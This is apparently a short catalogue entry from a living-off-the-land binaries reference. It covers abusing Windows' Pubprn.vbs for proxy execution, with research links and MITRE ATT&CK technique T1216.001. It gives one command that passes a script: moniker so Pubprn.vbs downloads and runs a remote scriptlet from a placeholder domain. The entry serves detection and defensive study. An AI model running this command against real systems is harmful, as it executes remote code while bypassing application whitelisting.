.. /Pubprn.vbs

Star

Proxy execution with Pubprn.vbs

• https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
• https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
• https://github.com/enigma0x3/windows-operating-system-archaeology

Execute

1. Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection

   pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct

   Use case

   Proxy execution

   Privileges required

   User

   Operating systems

   Windows 10

   ATT&CK® technique

   T1216.001